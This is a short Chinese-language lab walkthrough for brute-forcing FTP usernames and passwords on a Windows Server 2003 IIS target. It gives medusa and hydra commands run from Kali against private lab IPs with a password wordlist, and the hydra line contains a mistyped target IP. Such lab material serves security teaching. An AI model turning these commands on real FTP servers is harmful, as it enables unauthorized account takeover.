FTP用户名密码暴力破解

实验环境：

攻击机：kali linux 
ip:192.168.172.134
目标机：windows server 2003 Enterprise x64 SP2 
ip:192.168.172.137

实验环境搭建：

step1:在windows server 2003 Enterprise x64 SP2 中安装FTP,"开始"--"控制面版"--“添加删除程序”--“应用程序服务器”--“Internet信息服务（IIS）”--"文件传输协议（FTP）服务"--“确定”-----“下一步”等一路安装FTP（中途可能会遇到安装镜像文件，百度搜索IIS6.0下载）。

setp2:为FTP添加账户：“开始”--“管理工具”--“默认FTP站点”--“右键属性”--“安全账户”--“浏览”--“高级”--“立即查找”--“选择登陆的管理员账户”--“确定”

step3:此时FTP 拥有了一个管理员账户。环境搭建完毕。

攻击过程：

工具1：medusa

step1:kali 中打开终端,输入:medusa -h 192.168.172.137 -u 用户名 -P /root/Desktop/password.txt -M ftp

//-M为要攻击的模式  ，medusa -d    //查看攻击模块列表

 

step2:暴力破解密码成功，wireshark中获得用户名密码

工具2：hydra

step1:kali终端中输入：hydra -l 用户名 -P 字典 ftp:192.18.172.137